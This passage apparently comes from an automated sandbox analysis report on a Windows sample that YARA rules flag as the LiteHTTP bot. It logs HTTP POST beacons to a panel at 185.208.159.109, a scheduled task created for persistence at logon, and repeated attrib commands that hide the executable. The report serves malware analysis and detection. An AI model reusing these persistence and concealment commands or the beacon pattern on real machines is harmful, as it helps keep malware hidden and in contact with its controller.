                                        Dec 17, 2024 10:22:55.472045898 CET471OUTData Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=Xfp4UHTAOzVRojl53ZnJ~DpOy/YqNSzD2TEmrgeCO8E=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:22:56.399256945 CET25INHTTP/1.1 100 Continue
                                        Dec 17, 2024 10:22:56.632327080 CET203INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:22:56 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17192.168.2.549992185.208.159.10980
                                        TimestampBytes transferredDirectionData
                                        Dec 17, 2024 10:23:13.101975918 CET218OUTPOST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:23:13.456403971 CET471OUTData Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=xVu0Qs2GDm9vhxVZdowHo65Cx6Lk570aXO~vR4zPdoU=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:23:14.379671097 CET25INHTTP/1.1 100 Continue
                                        Dec 17, 2024 10:23:14.616410971 CET203INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:23:14 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18192.168.2.549993185.208.159.10980
                                        TimestampBytes transferredDirectionData
                                        Dec 17, 2024 10:23:20.681636095 CET218OUTPOST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:23:21.034584999 CET471OUTData Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=Xfp4UHTAOzVRojl53ZnJ~DpOy/YqNSzD2TEmrgeCO8E=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:23:21.092236042 CET25INHTTP/1.1 100 Continue
                                        Dec 17, 2024 10:23:21.449776888 CET203INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:23:20 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19192.168.2.549995185.208.159.10980
                                        TimestampBytes transferredDirectionData
                                        Dec 17, 2024 10:23:23.353261948 CET218OUTPOST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:23:23.706594944 CET471OUTData Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=Xfp4UHTAOzVRojl53ZnJ~DpOy/YqNSzD2TEmrgeCO8E=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:23:24.637139082 CET25INHTTP/1.1 100 Continue
                                        Dec 17, 2024 10:23:24.868328094 CET203INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:23:24 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20192.168.2.549996185.208.159.10980
                                        TimestampBytes transferredDirectionData
                                        Dec 17, 2024 10:23:31.639780045 CET218OUTPOST /panel/page.php HTTP/1.1
                                        User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 185.208.159.109
                                        Content-Length: 471
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Dec 17, 2024 10:23:31.987653017 CET471OUTData Raw: 69 64 3d 2f 70 68 36 58 43 38 34 4d 55 73 37 52 77 41 66 79 66 6c 38 62 69 54 4a 73 56 5a 35 5a 44 71 7a 36 7a 45 42 75 56 45 67 6d 71 6c 52 6b 6d 47 53 41 66 38 4f 46 48 4b 6d 4c 6a 75 46 41 72 2f 54 55 6d 53 54 32 31 7a 7a 4b 63 73 50 76 36 49
                                        Data Ascii: id=/ph6XC84MUs7RwAfyfl8biTJsVZ5ZDqz6zEBuVEgmqlRkmGSAf8OFHKmLjuFAr/TUmST21zzKcsPv6I~wPyDcw==&os=WmHrQQlULtaStm0L6iNTyQgU0WaTzr96fBueKT/QsXY=&pv=xVu0Qs2GDm9vhxVZdowHo65Cx6Lk570aXO~vR4zPdoU=&ip=B4Cj~hkuhtnFP5Gl58t98qcj6~0WK5UOkXwJgfNWz2ggnGKt3evR
                                        Dec 17, 2024 10:23:32.917309046 CET25INHTTP/1.1 100 Continue
                                        Dec 17, 2024 10:23:33.153312922 CET203INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 09:23:32 GMT
                                        Server: Apache/2.4.62 (Debian)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:04:19:07
                                        Start date:17/12/2024
                                        Path:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x550000
                                        File size:1'763'328 bytes
                                        MD5 hash:D37DAB4C59E707F632BB0B91EAA87FF9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.4541067680.0000000000552000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.4552402541.0000000008C02000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000003.2061776239.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.4552122250.00000000087A2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000000.00000002.4552952321.0000000009062000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:false

                                        General

                                        Target ID:4
                                        Start time:04:20:05
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:"schtasks" /Query /TN "DQmU06kq9I"
                                        Imagebase:0xee0000
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:04:20:05
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:04:20:05
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "DQmU06kq9I" /tr "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0xee0000
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:7
                                        Start time:04:20:05
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:8
                                        Start time:04:20:07
                                        Start date:17/12/2024
                                        Path:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Imagebase:0x7ff632ac0000
                                        File size:1'763'328 bytes
                                        MD5 hash:D37DAB4C59E707F632BB0B91EAA87FF9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000008.00000002.4541316207.0000000000552000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000008.00000003.2654669900.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:false

                                        General

                                        Target ID:9
                                        Start time:04:20:19
                                        Start date:17/12/2024
                                        Path:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x550000
                                        File size:1'763'328 bytes
                                        MD5 hash:D37DAB4C59E707F632BB0B91EAA87FF9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000009.00000003.2782245640.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000009.00000002.4552478393.0000000008BA2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000009.00000002.4541221969.0000000000552000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000009.00000002.4552255837.0000000008742000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000009.00000002.4552061627.00000000082E2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:false

                                        General

                                        Target ID:10
                                        Start time:04:20:21
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):true
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x8a0000
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:false

                                        General

                                        Target ID:11
                                        Start time:04:20:21
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:12
                                        Start time:04:20:42
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):true
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x7ff757150000
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:13
                                        Start time:04:20:42
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:14
                                        Start time:04:21:00
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):true
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x8a0000
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:15
                                        Start time:04:21:00
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:16
                                        Start time:04:21:07
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:"schtasks" /Query /TN "DQmU06kq9I"
                                        Imagebase:0xee0000
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:17
                                        Start time:04:21:07
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:18
                                        Start time:04:21:19
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):true
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x8a0000
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:19
                                        Start time:04:21:19
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:20
                                        Start time:04:21:29
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):true
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x7ff6068e0000
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:21
                                        Start time:04:21:29
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:22
                                        Start time:04:21:31
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):true
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x8a0000
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:23
                                        Start time:04:21:31
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:24
                                        Start time:04:21:44
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):true
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x8a0000
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:25
                                        Start time:04:21:44
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:26
                                        Start time:04:21:50
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):true
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x8a0000
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:27
                                        Start time:04:21:50
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:28
                                        Start time:04:21:56
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):true
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:0x8a0000
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:29
                                        Start time:04:21:56
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:30
                                        Start time:04:21:58
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:31
                                        Start time:04:21:58
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:32
                                        Start time:04:22:18
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):
                                        Commandline:"schtasks" /Query /TN "DQmU06kq9I"
                                        Imagebase:
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:33
                                        Start time:04:22:19
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:34
                                        Start time:04:22:19
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:35
                                        Start time:04:22:20
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:36
                                        Start time:04:22:20
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:37
                                        Start time:04:22:29
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:38
                                        Start time:04:22:29
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:39
                                        Start time:04:22:32
                                        Start date:17/12/2024
                                        Path:C:\Windows\SysWOW64\attrib.exe
                                        Wow64 process (32bit):
                                        Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
                                        Imagebase:
                                        File size:19'456 bytes
                                        MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:40
                                        Start time:04:22:32
                                        Start date:17/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:41
                                        Start time:04:22:37
